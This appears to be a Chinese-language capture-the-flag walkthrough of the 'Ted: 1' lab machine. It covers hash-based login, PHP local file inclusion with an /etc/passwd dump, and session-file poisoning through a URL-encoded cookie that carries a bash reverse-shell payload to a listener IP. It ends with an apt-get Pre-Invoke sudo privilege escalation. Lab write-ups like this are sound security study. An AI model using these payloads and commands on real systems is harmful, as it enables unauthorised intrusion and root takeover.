Ted: 1

靶机地址

Nmap 扫描了一下只开了一个 80 端口

![](https://cdn.jsdelivr.net/gh/cooorgi/img@main/img/Pasted image 20250430130735.png)

那就用 dirsearch 扫一下网站,没扫出来东西,只有一个登录界面,尝试登录提示 hash 不对

尝试了一下其他的,回显不一样,密码应该就是 admin

image-20250503014523247

最后发现是 sha256 记得要是大写的

admin/8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

![](https://cdn.jsdelivr.net/gh/cooorgi/img@main/img/Pasted image 20250430182149.png)

image-20250503014534329

是一个简单文件服务器,搜一下 /etc/passwd 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
ted:x:1000:1000:Ted,,,:/home/ted:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false

本来以为是读文件,然后回显文件内容的文件服务器,结果是 php 文件包含,那就简单了

![](https://cdn.jsdelivr.net/gh/cooorgi/img@main/img/Pasted image 20250430174321.png)

但试了下伪协议和远程文件包含,不行。开启了 session,那就试试 session 文件包含(为什么不用日志包含,因为找不到日志的位置,有可能没有权限或者是压根没开日志),试了下 session 文件存放路径在 /var/lib/php/sessions/,还好这是个好人,然后看到 user_pref 字段也在里边,那更好了,应该不用条件竞争了

image-20250503014046290

Ok 成功写马,直接反弹 shell

![](https://cdn.jsdelivr.net/gh/cooorgi/img@main/img/Pasted image 20250430175826.png)

1
2
3
Cookie: PHPSESSID=[SessionID]; user_pref=%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%22%62%61%73%68%20%2d%69%20%3e%26%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%33%34%2e%31%32%39%2f%39%30%39%39%20%30%3e%26%31%22%29%3b%3f%3e
bash -i >&/dev/tcp/192.168.234.129/9099 0>&1
search=/var/lib/php/sessions/sess_[SessionID]

![](https://cdn.jsdelivr.net/gh/cooorgi/img@main/img/Pasted image 20250430215610.png)

然后使用下边的命令通过 apt-get 提权

1
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash